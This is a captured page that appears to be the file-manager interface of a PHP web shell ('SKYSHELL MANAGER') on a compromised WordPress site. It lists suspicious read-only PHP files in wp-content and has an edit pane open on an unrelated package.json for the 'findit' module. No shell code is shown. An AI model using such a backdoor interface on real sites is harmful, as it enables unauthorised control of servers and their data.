📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "findit", "version": "2.0.0", "description": "walk a directory tree recursively with events", "main": "index.js", "devDependencies": { "tap": "~0.4.4", "mkdirp": "~0.3.5" }, "scripts": { "test": "tap test/*.js" }, "repository": { "type": "git", "url": "http://github.com/substack/node-findit.git" }, "keywords": [ "find", "walk", "directory", "recursive", "tree", "traversal" ], "author": { "name": "James Halliday", "email": "mail@substack.net", "url": "http://substack.net" }, "license": "MIT" }
Save